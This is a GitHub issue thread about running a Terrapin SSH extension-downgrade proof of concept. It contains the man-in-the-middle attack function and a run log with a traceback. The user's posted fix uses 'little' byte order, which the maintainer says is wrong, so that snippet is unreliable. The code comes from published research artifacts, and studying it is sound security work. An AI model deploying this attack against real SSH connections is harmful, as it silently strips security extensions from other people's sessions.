Closed charlesmanser closed 6 months ago
Specifying "little" as the byteorder seems to have resolved the issue:
def perform_attack(client_socket, server_socket):
# Version exchange
client_vex = client_socket.recv(255)
server_vex = server_socket.recv(255)
client_socket.send(server_vex)
server_socket.send(client_vex)
# SSH_MSG_KEXINIT
client_kexinit = client_socket.recv(35000)
server_kexinit = server_socket.recv(35000)
client_socket.send(server_kexinit)
server_socket.send(client_kexinit)
# Client will now send the key exchange INIT
client_kex_init = client_socket.recv(35000)
server_socket.send(client_kex_init)
# Insert ignore message (to client)
client_socket.send(rogue_msg_ignore)
# Wait half a second here to avoid missing EXT_INFO
# Can be solved by counting bytes as well
sleep(0.5)
# KEX_REPLY / NEW_KEYS / EXT_INFO
server_response = server_socket.recv(35000)
# Strip EXT_INFO before forwarding server_response to client
# Length fields of KEX_REPLY and NEW_KEYS are still unencrypted
byteorder = "little"
server_kex_reply_length = LENGTH_FIELD_LENGTH + int.from_bytes(server_response[:LENGTH_FIELD_LENGTH], byteorder=byteorder)
server_newkeys_start = server_kex_reply_length
server_newkeys_length = LENGTH_FIELD_LENGTH + int.from_bytes(server_response[server_newkeys_start:server_newkeys_start + LENGTH_FIELD_LENGTH], byteorder=byteorder)
server_extinfo_start = server_newkeys_start + server_newkeys_length
client_socket.send(server_response[:server_extinfo_start])
how did you get the issue , tell me steps you ve followed so that i can regenerate the issue
[root@cm-terrapin ext-downgrade]# python ext_downgrade_chacha20_poly1305.py
--- Proof of Concept for extension downgrade attack (ChaCha20-Poly1305) ---
[+] MitM Proxy started. Listening on ('127.0.0.1', 2222) for incoming connections...
[+] Accepted connection from: ('127.0.0.1', 46684)
[+] Establishing new target connection to ('10.32.152.27', 22).
[+] Performing extension downgrade
Traceback (most recent call last):
File "/root/Terrapin-Artifacts/pocs/ext-downgrade/ext_downgrade_chacha20_poly1305.py", line 87, in <module>
perform_attack(client_socket, server_socket)
File "/root/Terrapin-Artifacts/pocs/ext-downgrade/ext_downgrade_chacha20_poly1305.py", line 66, in perform_attack
server_kex_reply_length = LENGTH_FIELD_LENGTH + int.from_bytes(server_response[:LENGTH_FIELD_LENGTH])
TypeError: from_bytes() missing required argument 'byteorder' (pos 2)
The default argument value for byteorder
has been added in Python 3.11. Using a python version < 3.11 will yield the error mentioned above as byteorder
is required and no default argument value is set. Note that Python 3.11 and newer will default to byteorder = 'big'
, which is correct in this context (network byte order). Setting byteorder = 'little'
may cause unexpected behavior due to wrong byte order conversion.
I will update the PoCs with an explicit byteorder = 'big'
argument. To avoid this issue entirely, you may update your Python version to 3.11 or newer.
I have added the explicit byteorder = 'big'
argument in https://github.com/RUB-NDS/Terrapin-Artifacts/commit/8a2416c82ebd2a1a097c11f513bbab73db55798e, which should fix this issue. Feel free to reopen in case your issue persists.
Issue running ext_downgrade_chacha20_poly1305.py
Running on: